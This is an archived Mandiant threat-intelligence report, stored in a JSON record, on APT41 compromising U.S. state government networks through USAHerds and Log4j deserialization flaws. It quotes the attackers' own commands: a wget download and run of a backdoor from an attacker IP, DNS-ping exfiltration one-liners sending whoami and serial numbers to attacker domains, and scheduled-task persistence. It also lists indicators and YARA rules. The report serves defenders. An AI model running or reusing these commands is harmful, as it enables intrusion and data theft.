{
	"id": "f5990ce0-be4a-44ef-a252-c6edff659f51",
	"created_at": "2026-04-06T00:11:35.789525Z",
	"updated_at": "2026-04-10T03:36:13.842634Z",
	"deleted_at": null,
	"sha1_hash": "dbb55bc5b016da66d2021a78743f7284add9c492",
	"title": "APT41 Targeting U.S. State Government Networks | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 871883,
	"plain_text": "APT41 Targeting U.S. State Government Networks | Mandiant\r\nBy Mandiant\r\nPublished: 2022-03-08 · Archived: 2026-04-05 15:44:54 UTC\r\nWritten by: Rufus Brown, Van Ta, Douglas Bienstock, Geoff Ackerman, John Wolfram\r\nUPDATE (Mar. 8): The original post may not have provided full clarity that CVE-2021-44207 (USAHerds) had a patch\r\ndeveloped by Acclaim Systems for applicable deployments on or around Nov. 15, 2021. Mandiant cannot speak to the\r\naffected builds, deployment, adoption, or other technical factors of this vulnerability patch beyond its availability.\r\nIn May 2021 Mandiant responded to an APT41 intrusion targeting a United States state government computer network. This\r\nwas just the beginning of Mandiant’s insight into a persistent months-long campaign conducted by APT41 using vulnerable\r\nInternet facing web applications as their initial foothold into networks of interest. APT41 is a prolific Chinese state-sponsored espionage group known to target organizations in both the public and private sectors and also conducts financially\r\nmotivated activity for personal gain.\r\nIn this blog post, we detail APT41’s persistent effort that allowed them to successfully compromise at least six U.S. state\r\ngovernment networks by exploiting vulnerable Internet facing web applications, including using a zero-day vulnerability in\r\nthe USAHerds application (CVE-2021-44207) as well as the now infamous zero-day in Log4j (CVE-2021-44228). While\r\nthe overall goals of APT41's campaign remain unknown, our investigations into each of these intrusions has revealed a\r\nvariety of new techniques, malware variants, evasion methods, and capabilities.\r\nCampaign Overview\r\nAlthough APT41 has historically performed mass scanning and exploitation of vulnerabilities, our investigations into APT41\r\nactivity between May 2021 and February 2022 uncovered evidence of a deliberate campaign targeting U.S. state\r\ngovernments. 
During this timeframe, APT41 successfully compromised at least six U.S. state government networks through\r\nthe exploitation of vulnerable Internet facing web applications, often written in ASP.NET. In most of the web application\r\ncompromises, APT41 conducted .NET deserialization attacks; however, we have also observed APT41 exploiting SQL\r\ninjection and directory traversal vulnerabilities.\r\nIn the instance where APT41 gained access through a SQL injection vulnerability in a proprietary web application, Mandiant\r\nManaged Defense quickly detected and contained the activity; however, two weeks later APT41 re-compromised the\r\nnetwork by exploiting a previously unknown zero-day vulnerability in a commercial-off-the-shelf (CoTS) application,\r\nUSAHerds. In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also\r\ncompromised a separate, unrelated agency in the same state.\r\nAPT41 was also quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while\r\nalso maintaining existing operations. On December 10th, 2021, the Apache Foundation released an advisory for a critical\r\nremote code execution (RCE) vulnerability in the commonly used logging framework Log4J. Within hours of the advisory,\r\nAPT41 began exploiting the vulnerability to later compromise at least two U.S. state governments as well as their more\r\ntraditional targets in the insurance and telecommunications industries.\r\nIn late February 2022, APT41 re-compromised two previous U.S. state government victims. Our ongoing investigations\r\nshow the activity closely aligns with APT41's May-December 2021 activity, representing a continuation of their campaign\r\ninto 2022 and demonstrating their unceasing desire to access state government networks. A timeline of representative\r\nintrusions from this campaign can be seen in Figure 1.\r\nFigure 1: U.S. 
state government campaign timeline\r\nThe goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal\r\nIdentifiable Information (PII). Although the victimology and targeting of PII data is consistent with an espionage operation,\r\nhttps://www.mandiant.com/resources/blog/apt41-us-state-governments\r\nPage 1 of 9\n\nMandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial\ngain.\nExploitation of Deserialization Vulnerabilities\nAPT41 has primarily used malicious ViewStates to trigger code execution against targeted web applications. Within the\nASP.NET framework, ViewState is a method for storing the application’s page and control values in HTTP requests to and\nfrom the server. The ViewState is sent to the server with each HTTP request as a Base64 encoded string in a hidden form\nfield. The web server decodes the string and applies additional transformations to the string so that it can be unpacked into\ndata structures the server can use. This process is known as deserialization.\nInsecure deserialization of user-supplied input can result in code execution. ASP.NET has several insecure deserialization\nproviders, including the one used for ViewStates: ObjectStateFormatter. To prevent a threat actor from manipulating the\nViewState and taking advantage of the insecure deserialization provider, the ViewState is protected by a Message\nAuthentication Code (MAC). This MAC is a cryptographically signed hash value that the server uses to ensure that the\nViewState has not been tampered with, possibly to trigger code execution. The integrity of the ViewState depends on the\napplication’s machineKey remaining confidential. 
The machineKey is stored on the application server in a configuration file\nnamed web.config.\nFigure 2: Sample machineKey attribute from a web.config file\nA threat actor with knowledge of the machineKey can construct a malicious ViewState and then generate a new and valid\nMAC that the server accepts. With a valid MAC, the server will then deserialize the malicious ViewState, resulting in the\nexecution of code on the server. Publicly available tools such as YSoSerial.NET exist to construct these malicious\nViewStates. This is precisely how APT41 initiated their campaign in May 2021.\nProprietary Web Application Targeting\nIn June 2020, one year before APT41 began this campaign, Mandiant investigated an incident where APT41 exploited a\ndirectory traversal vulnerability specifically to read the web.config file for a vulnerable web application on a victim web\nserver. APT41 then used the machineKey values from the web.config file to generate a malicious ViewState payload for a\ndeserialization exploit. Mandiant did not identify how APT41 originally obtained the machineKey values for the proprietary\napplication exploited in May 2021 or the USAHerds application, which was first exploited in July 2021. However, it is\nlikely that APT41 obtained the web.config file through similar means.\nTo craft malicious ViewStates, APT41 relied on the publicly available GitHub project YSoSerial.NET. In order to\nsuccessfully load arbitrary .NET assemblies into memory, APT41 set the DisableActivitySurrogateSelectorTypeCheck\nproperty flag to true within the ConfigurationManager.AppSettings class of the running application via the ViewState\npayload. 
APT41 subsequently loaded .NET assemblies into memory using additional YSoSerial payloads configured to write\nwebshells to a hardcoded filepath on disk.\nFigure 3: Deserialized .NET Assembly (dnSpy)\nFigure 4 shows an example JScript webshell deployed through a malicious ViewState object by APT41 which utilizes Code\nPage 936 for the Chinese Simplified keyboard language.\nFigure 4: Deserialized JScript Webshell\r\nFor additional information regarding deserialization exploits and our new hunting rule generation tool ‘HeySerial’, read our\r\nblog post, Now You Serial, Now You Don’t — Systematically Hunting for Deserialization Exploits.\r\nUSAHerds (CVE-2021-44207) Zero-Day\r\nIn three investigations from 2021, APT41 exploited a zero-day vulnerability in the USAHerds web application. USAHerds is\r\na CoTS application written in ASP.NET and used by 18 states for animal health management. The vulnerability in\r\nUSAHerds (CVE-2021-44207) is similar to a previously reported vulnerability in Microsoft Exchange Server\r\n(CVE-2020-0688), where the applications used a static validationKey and decryptionKey (collectively known as the machineKey) by\r\ndefault. As a result, all installations of USAHerds shared these values, which is against the best practice of using uniquely\r\ngenerated machineKey values per application instance.\r\nGenerating unique machineKey values is critical to the security of an ASP.NET web application because the values are used\r\nto secure the integrity of the ViewState.\r\nMandiant did not identify how APT41 originally obtained the machineKey values for USAHerds; however, once APT41\r\nobtained the machineKey, they were able to compromise any server on the Internet running USAHerds. 
As a result, there are\r\npotentially additional unknown victims.\r\nLog4j (CVE-2021-44228)\r\nThe most recent APT41 campaign began shortly after the release of CVE-2021-44228 and its related proof-of-concept\r\nexploits in December 2021. Exploiting this vulnerability, also known as Log4Shell, causes Java to fetch and deserialize a\r\nremote Java object, resulting in potential code execution. Similar to their previous web application targeting, APT41\r\ncontinued to use YSoSerial generated deserialization payloads to perform reconnaissance and deploy backdoors. Notably,\r\nAPT41 deployed a new variant of the KEYPLUG backdoor on Linux servers at multiple victims, a malware sub-family we\r\nnow track as KEYPLUG.LINUX. KEYPLUG is a modular backdoor written in C++ that supports multiple network\r\nprotocols for command and control (C2) traffic including HTTP, TCP, KCP over UDP, and WSS. APT41 heavily used the\r\nWindows version of the KEYPLUG backdoor at state government victims between June 2021 and December 2021, thus the\r\ndeployment of a ported version of the backdoor closely following the state government campaign was significant.\r\nAfter exploiting Log4Shell, APT41 continued to use deserialization payloads to issue ping commands to domains, a\r\ntechnique APT41 frequently used at government victims months prior. An example ping command is shown in Figure 5.\r\nping -c 1 libxqagv[.]ns[.]dns3[.]cf\r\nFigure 5: Ping Command to Attacker Controlled Infrastructure\r\nUpon gaining access to a target environment, APT41 performed host and network reconnaissance before deploying\r\nKEYPLUG.LINUX to establish a foothold in the environment. 
Sample commands used to deploy KEYPLUG.LINUX can\r\nbe seen in Figure 6.\r\nwget http://103.224.80[.]44:8080/kernel\r\nchmod 777 kernel\r\nmv kernel .kernel\r\nnohup ./.kernel \u0026\r\nFigure 6: Deployment of KEYPLUG.LINUX Following Log4j Exploitation\r\n“All Killer No Filler” Intrusion TTPs\r\nThe updated tradecraft and new malware continue to show APT41 is a highly adaptable and resourceful actor. In this\r\nsection, we detail the most pertinent post-compromise techniques.\r\nReconnaissance\r\nAfter gaining initial access to an internet-facing server, APT41 performed extensive reconnaissance and credential\r\nharvesting. A common tactic seen is the deployment of a ConfuserEx obfuscated BADPOTATO binary to abuse named pipe\r\nimpersonation for local NT AUTHORITY\\SYSTEM privilege escalation. Once APT41 escalated to NT\r\nAUTHORITY\\SYSTEM privileges, they copied the local SAM and SYSTEM registry hives to a staging directory for\r\ncredential harvesting and exfiltration. APT41 has additionally used Mimikatz to execute the lsadump::sam command on the\r\ndumped registry hives to obtain locally stored credentials and NTLM hashes.\r\nAPT41 also conducted Active Directory reconnaissance by uploading the Windows command-line tool dsquery.exe (MD5:\r\n49f1daea8a115dd6fce51a1328d863cf) and its associated module dsquery.dll (MD5: b108b28138b93ec4822e165b82e41c7a)\r\nto a staging directory on the compromised server. 
Figure 7 shows multiple dsquery commands used to enumerate various\r\nActive Directory objects within the environment.\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Person)\" -attr cn title displayName description department company\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn operatingSystem operatingSystemServicePack opera\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Computer)\" -attr cn servicePrincipalName -L -limit 0\r\nc:\\programdata\\dsquery.exe * -filter \"(objectCategory=Group)\" -uc -attr cn sAMAccountName distinguishedName description -l\r\nc:\\programdata\\dsquery.exe * -filter \"(objectClass=organizationalUnit)\" -attr ou name whenCreated distinguishedName gPLink\r\nFigure 7: dsquery Active Directory Reconnaissance Commands\r\nDuring the early stage of one U.S. state government intrusion, Mandiant identified a new malware family used by APT41 we\r\ntrack as DUSTPAN. DUSTPAN is an in-memory dropper written in C++ that leverages ChaCha20 to decrypt embedded\r\npayloads. Different variations of DUSTPAN may also load and execute a payload from a hard-coded filepath encrypted in\r\nthe binary. DUSTPAN is consistent with the publicly named StealthVector, reported by Trend Micro in August 2021. During\r\nthe intrusion, DUSTPAN was used to drop a Cobalt Strike BEACON backdoor.\r\nAnti-Analysis\r\nAPT41 continues to leverage advanced malware in their existing toolkit, such as the DEADEYE launcher and LOWKEY\r\nbackdoor, with added capabilities and anti-analysis techniques to hinder investigations. During a recent intrusion Mandiant\r\nidentified a new malware variant, DEADEYE.EMBED, contained in an Alternate Data Stream of a local file.\r\nDEADEYE.EMBED variants embed the payload inside of the compiled binary rather than appended to the overlay at the\r\nend of the file, as seen in DEADEYE.APPEND.\r\nAPT41 commonly packages their malware with VMProtect to slow reverse engineering efforts. 
During multiple U.S. state\r\ngovernment intrusions, APT41 incorporated another anti-analysis technique by chunking a VMProtect packaged DEADEYE\r\nbinary into multiple sections on disk. Breaking the binary into multiple files reduces the chance that all samples can be\r\nsuccessfully acquired during a forensic investigation. Common file naming conventions used by APT41 when deploying\r\nDEADEYE on victim hosts can be seen in Figure 8.\r\nFigure 8: DEADEYE Filenames\r\nThese files would then be combined into a single DLL before execution as seen in Figure 9.\r\n\"cmd\" /c copy /y /b C:\\Users\\public\\syslog_6-*.dat C:\\Users\\public\\syslog.dll\r\nFigure 9: DEADEYE Command to concatenate DEADEYE sections\r\nIn addition to separating their VMProtect packaged malware on disk, APT41 changed the standard VMProtect section names\r\n(.vmp) to UPX section names (.upx). By doing so, the malware could evade basic hunting detections that flag binaries\r\npackaged with VMProtect. During Log4j exploitation, APT41 similarly chunked a KEYPLUG.LINUX binary into four\r\nseparate files named “xaa”, “xab”, “xac”, and “xad”. APT41 also packaged the KEYPLUG.LINUX binary with VMProtect\r\nand used UPX section names. This technique is very low in prevalence across our malware repository, and even lower in\r\nprevalence when searching across ELF files.\r\nAPT41 also updated the DEADEYE execution guardrail capabilities used during the campaign. Guardrailing is a technique\r\nused by malware to ensure that the binary only executes on systems that the threat actor intended. DEADEYE samples from\r\nolder campaigns used the victim computer’s volume serial number but they have since been updated to use the hostname\r\nand/or DNS domain during the U.S. state government campaign. 
To acquire the local computer’s hostname and DNS\r\ndomain, DEADEYE executes the WinAPI functions GetComputerNameA and/or GetComputerNameExA and provides it as\r\ninput for a generated decryption key.\r\nPersistence\r\nAPT41 continues to leverage advanced tradecraft to remain persistent and undetected. In multiple instances, the Windows\r\nversion of the KEYPLUG backdoor leveraged dead drop resolvers on two separate tech community forums. The malware\r\nfetches its true C2 address from encoded data on a specific forum post. Notably, APT41 continues to update the community\r\nforum posts frequently with new dead drop resolvers during the campaign. APT41 has historically used this unique\r\ntradecraft during other intrusions to help keep their C2 infrastructure hidden.\r\nTo persist execution of DEADEYE, APT41 has leveraged the schtasks /change command to modify existing scheduled tasks\r\nthat run under the context of SYSTEM. APT41 commonly uses the living off the land binary (lolbin)\r\nshell32.dll!ShellExec_RunDLLA in scheduled tasks for binary execution, such as the example shown in Figure 10.\r\nSCHTASKS /Change /tn \"\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\" /TR \"C:\\windows\\system32\\rundll32.exe\r\nFigure 10: Modified Scheduled Task\r\nAPT41 has leveraged the following Windows scheduled tasks for persistence of DEADEYE droppers in U.S. state\r\ngovernment intrusions:\r\n\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor\r\n\\Microsoft\\Windows\\Ras\\ManagerMobility\r\n\\Microsoft\\Windows\\WDI\\SrvSetupResults\r\n\\Microsoft\\Windows\\WDI\\USOShared\r\nAnother technique APT41 used to launch malware is through the addition of a malicious import to the Import Address Table\r\n(IAT) of legitimate Windows PE binaries. As a result, once the legitimate binary is executed, it will load the malicious\r\nlibrary and call its DllEntryPoint. 
A modified IAT of a legitimate Microsoft HealthService.exe binary can be seen in Figure\r\n11.\r\nFigure 11: Modified IAT (CFF Explorer)\r\nAPT41 continues to tailor their malware to victim environments through their stealthy passive backdoor\r\nLOWKEY.PASSIVE. During one intrusion, APT41 exploited a USAHerds server and subsequently executed\r\nDEADEYE.APPEND which dropped LOWKEY.PASSIVE in-memory. The identified LOWKEY.PASSIVE sample listened\r\nfor incoming connections that request either of the following URL endpoints:\r\nhttp://\u003cHOST:PORT\u003e/USAHerds/Common/%s.css\r\nhttps://\u003cHOST:PORT\u003e/USAHerds/Common/%s.css\r\nAPT41 frequently configured LOWKEY.PASSIVE URL endpoints to masquerade as normal web application traffic on an\r\ninfected server.\r\n“It’s Always Cloudy in Chengdu” — Cloudflare Usage\r\nAPT41 has substantially increased their usage of Cloudflare services for C2 communications and data exfiltration.\r\nSpecifically, APT41 leveraged Cloudflare Workers to deploy serverless code accessible through the Cloudflare CDN which\r\nhelps proxy C2 traffic to APT41 operated infrastructure.\r\nAt multiple victims, APT41 issued ping commands where the output of a reconnaissance command was prepended to\r\nsubdomains of Cloudflare proxied infrastructure. Once the ping command was executed, the local DNS resolver attempted\r\nto resolve the fabricated domain containing the prepended command output. 
The forward DNS lookup eventually reached\r\nthe primary domain's Cloudflare name servers, which were unable to resolve an IP address for the fabricated domain.\r\nHowever, the DNS activity logs of the attacker-controlled domain recorded the DNS lookup of the subdomain, allowing the\r\ngroup to collect the reconnaissance command output.\r\nExamples of this technique can be seen in Figure 12 to Figure 15.\r\n$a=whoami;ping ([System.BitConverter]::ToString([System.Text.Encoding]::UTF8.GetBytes($a)).replace('-','')+\"\"[.]ns[.]time\r\nFigure 12: Reconnaissance Exfiltration\r\ncmd.exe /c ping %userdomain%[.]ns[.]time12[.]cf\r\nFigure 13: Reconnaissance Exfiltration\r\nIn Figure 14, APT41 issued a command to find the volume serial number of the system, which has historically been used as\r\nthe decryption key for DEADEYE payloads.\r\nping -n 1 ((cmd /c dir c:\\|findstr Number).split()[-1]+'.ns[.]time12[.]cf\r\nFigure 14: Volume Serial Number Exfiltration\r\nIn this last example, the command prints the length of the file syslog_6-1.dat, likely to ensure it has been fully written to\r\ndisk prior to combining the multiple files into the full malicious executable.\r\nping -n 1 ((ls C:\\Users\\public\\syslog_6-1.dat).Length.ToString()+\"\".ns[.]time12[.]cf\"\")\r\nFigure 15: File Size Exfiltration\r\nAPT41 leveraged the aforementioned technique for further data exfiltration by hex encoding PII data and prepending the\r\nresults as subdomains of the attacker-controlled domain. The resulting DNS lookups triggered by the ping commands would\r\nbe recorded in the activity logs and available to APT41.\r\nAPT41’s continued usage of Cloudflare services is further exemplified in recently developed KEYPLUG samples. Mandiant\r\nidentified a unique capability added to KEYPLUG that leverages the WebSocket over TLS (WSS) protocol for C2\r\ncommunication. 
According to Cloudflare, WebSocket traffic can be established through the Cloudflare CDN edge servers,\r\nwhich will proxy data through to the specified origin server.\r\nKEYPLUG includes a hardcoded one-byte XOR encoded configuration file that lists the specific communication protocol,\r\nservers, and additional settings. After KEYPLUG decodes the hardcoded configuration file at runtime, it will parse the\r\nconfiguration to determine the appropriate network protocol and servers to use for command and control. After the\r\nconfiguration is parsed, KEYPLUG randomly chooses a CIDR block from the list then randomly chooses an IP address\r\nwithin the CIDR block based on the current tick count of the infected computer.\r\nFigure 16 details an example configuration file identified during a recent U.S. state government intrusion.\r\nWSS://104.24.0.0/14;103.22.200.0/22;103.21.244.0/22:443|7600|5|1|afdentry.workstation.eu.org:443\r\nFigure 16: KEYPLUG Configuration\r\nThe CIDR blocks listed in Figure 16 are Cloudflare CDN associated infrastructure that will redirect the WSS connection to\r\nthe malicious domain afdentry[.]workstation[.]eu[.]org.\r\nFigure 17 is an example HTTP request sent by KEYPLUG to initiate and upgrade to the WSS protocol using Cloudflare\r\ninfrastructure.\r\nFigure 17: KEYPLUG HTTP Upgrade Request\r\nWe notified Cloudflare of this malicious activity and they took prompt action to disrupt communications to the malicious\r\ninfrastructure. APT41’s increased usage of Cloudflare services indicates a desire to leverage Cloudflare’s flexibility and\r\ndeter identification and blocking of their true C2 servers.\r\nOutlook\r\nAPT41's recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to\r\npost-compromise tools and techniques. 
APT41 can quickly adapt their initial access techniques by re-compromising an\r\nenvironment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a\r\nwillingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use.\r\nAPT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting\r\nU.S. state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain\r\nunchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.\r\nIndicators\r\nMalware Family MD5 SHA1 SHA256\r\nKEYPLUG.LINUX 900ca3ee85dfc109baeed4888ccb5d39 355b3ff61db44d18003537be8496eb03536e300f e024ccc4c72eb5813cc2b6db7975\r\nKEYPLUG.LINUX b82456963d04f44e83442b6393face47 996aa691bbc1250b571a2f5423a5d5e2da8317e6 d7e8cc6c19ceebf0e125c9f18b50\r\nDSQUERY 49f1daea8a115dd6fce51a1328d863cf e85427af661fe5e853c8c9398dc46ddde50e2241 ebf28e56ae5873102b51da2cc49c\r\nDSQUERY b108b28138b93ec4822e165b82e41c7a 7056b044f97e3e349e3e0183311bb44b0bc3464f 062a7399100454c7a523a938293\r\nBADPOTATO 143278845a3f5276a1dd5860e7488313 6f6b51e6c88e5252a2a117ca1cfb57934930166b a4647fcb35c79f26354c34452e4a\r\nContext Indicator(s)\r\nU.S. 
State Government Campaign – USAHerds (CVE-2021-44207) Exploitation 194[.]195[.]125[.]121\r\n194[.]156[.]98[.]12\r\n54[.]248[.]110[.]45\r\n45[.]153[.]231[.]31\r\n185[.]118[.]167[.]40\r\n104[.]18[.]6[.]251\r\n104[.]18[.]7[.]251\r\n20[.]121[.]42[.]11\r\n34[.]139[.]13[.]46\r\n54[.]80[.]67[.]241\r\n149[.]28[.]15[.]152\r\n18[.]118[.]56[.]237\r\n107[.]172[.]210[.]69\r\n172[.]104[.]206[.]48\r\n67[.]205[.]132[.]162\r\n45[.]84[.]1[.]181\r\ncdn[.]ns[.]time12[.]cf\r\neast[.]winsproxy[.]com\r\nafdentry[.]workstation[.]eu[.]org\r\nns1[.]entrydns[.]eu[.]org\r\nsubnet[.]milli-seconds[.]com\r\nwork[.]viewdns[.]ml\r\nwork[.]queryip[.]cf\r\nLog4j (CVE-2021-44228) Exploitation\r\n103[.]238[.]225[.]37\r\n182[.]239[.]92[.]31\r\nmicrosoftfile[.]com\r\ndown-flash[.]com\r\nlibxqagv[.]ns[.]dns3[.]cf\r\nrule M_APT_Backdoor_KEYPLUG_MultiXOR_Config\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Matches KEYPLUG XOR-encoded configurations. 
Locates multiple values of: TCP://, UDP://, WSS://, +ht\r\n strings:\r\n // TCP\r\n $tcp1 = \"TCP://\" xor(0x01-0x2E)\r\n $tcp2 = \"TCP://\" xor(0x30-0xFF)\r\n $ptcp1 = \"|TCP://\" xor(0x01-0x2E)\r\n $ptcp2 = \"|TCP://\" xor(0x30-0xFF)\r\n // UDP\r\n $udp1 = \"UDP://\" xor(0x01-0x2E)\r\n $udp2 = \"UDP://\" xor(0x30-0xFF)\r\n $pudp1 = \"|UDP://\" xor(0x01-0x2E)\r\n $pudp2 = \"|UDP://\" xor(0x30-0xFF)\r\n // WSS\r\n $wss1 = \"WSS://\" xor(0x01-0x2E)\r\n $wss2 = \"WSS://\" xor(0x30-0x52)\r\n $wss3 = \"WSS://\" xor(0x54-0xFF)\r\n $pwss1 = \"|WSS://\" xor(0x01-0x2E)\r\n $pwss2 = \"|WSS://\" xor(0x30-0x52)\r\n $pwss3 = \"|WSS://\" xor(0x54-0xFF)\r\n // HTTP\r\n $http1 = \"+http\" xor(0x01-0x73)\r\n $http2 = \"+http\" xor(0x75-0xFF)\r\n $phttp1 = \"|+http\" xor(0x01-0x73)\r\n $phttp2 = \"|+http\" xor(0x75-0xFF)\r\n // Sleep value\r\n $zeros1 = \"00|\" xor(0x01-0x2F)\r\n $zeros2 = \"00|\" xor(0x31-0xFF)\r\n condition:\r\n filesize \u003c 10MB and\r\n (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)) and\r\n for any of ($tcp*,$udp*,$wss*,$http*): (# == 2 and @[2] - @[1] \u003c 200) and\r\n for any of ($ptcp*,$pudp*,$pwss*,$phttp*): (# == 1) and\r\n any of ($zeros*)\r\n}\r\nrule M_Hunting_MSIL_BADPOTATO\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting for BADPOTATO samples based on default strings found on the PE VERSIONINFO resource.\"\r\n strings:\r\n $dotnetdll = \"\\x00_CorDllMain\\x00\"\r\n $dotnetexe = \"\\x00_CorExeMain\\x00\"\r\n $s1 = { 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00 00 00 00 42 0\r\n $s2 = { 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 42 00 61 00 64 00 50 00 6F 0\r\n $s3 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 42 0\r\n $s4 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 
00 4E 00 61 00 6D 00 65 00 00 00 00 00 42 00 61 00 64 00 50 00 6F 0\r\n condition:\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and 1 of ($dotnet*) and 1 of ($s*)\r\n}\r\nAcknowledgements\r\nWe would like to thank our incident response consultants, Managed Defense responders, and FLARE reverse engineers who\r\nenable this research. In addition, we would like to thank Alyssa Rahman, Dan Perez, Ervin Ocampo, Blaine Stancill, and\r\nNick Richard for their technical reviews.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/apt41-us-state-governments",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/apt41-us-state-governments"
	],
	"report_names": [
		"apt41-us-state-governments"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
